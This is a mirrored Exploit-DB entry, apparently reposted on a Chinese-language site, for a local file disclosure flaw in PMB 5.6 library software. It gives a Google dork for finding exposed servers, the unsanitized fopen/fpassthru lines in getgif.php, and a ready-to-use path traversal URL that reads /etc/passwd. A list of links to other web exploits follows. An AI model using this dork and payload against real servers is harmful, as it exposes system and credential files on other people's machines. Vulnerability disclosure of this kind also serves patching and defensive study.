PMB 5.6 – ‘chemin’ Local File Disclosure

Exploit Database
89 阅读

作者： 41-trk

日期： 2020-11-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49054/

# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
# Date: 2020-10-13
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6 
# Tested on: Ubuntu 18.04.1

The PMB Gif Image is not sanitizing the 'chemin',
which leads to Local File Disclosure.

As of today (2020-10-13) this issue is unfixed.

Vulnerable code: (getgif.php )

line 55$fp2=@fopen($chemin, "rb");
line 68fpassthru($fp)


========================= Proof-of-Concept ===================================================

http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik

last Exploits
PMB 5.6 – ‘chemin’ Local File Disclosure的更多信息

Knowledgeroot (fckeditor) – Arbitrary File Upload：
Flatpress 0.909.1 – Persistent Cross-Site Scripting：
Docmint 1.0/2.1 – ‘id’ Cross-Site Scripting：
PHP SETI@home Web monitor – ‘PHPsetimon’ Local/Remote File Inclusion：
Jira 4.0.1 – Cross-Site Scripting / Information Disclosure：
Webify Photo Gallery – Arbitrary File Deletion：
WordPress Plugin Ripe HD FLV Player – SQL Injection：
phpplanner – Cross-Site Scripting / SQL Injection：